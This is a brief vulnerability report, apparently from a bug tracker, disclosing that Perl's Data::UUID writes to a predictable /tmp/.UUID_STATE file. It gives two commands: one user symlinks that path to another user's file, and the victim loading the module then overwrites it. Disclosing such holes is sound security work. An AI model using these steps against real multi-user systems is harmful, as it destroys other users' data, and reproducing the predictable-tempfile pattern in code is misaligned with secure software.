Subject: | Insecure usage of /tmp/.UUID_STATE |
A symlink attack via Data::UUID seems to be possible.
As user2:
ln -s /home/user1/test-file /tmp/.UUID_STATE
As user1:
perl -MData::UUID -e 'Data::UUID->new'
Then /home/user1/test-file is overwritten. I could not achieve the same
result via /tmp/.UUID_NODEID, but I have not studied this carefully.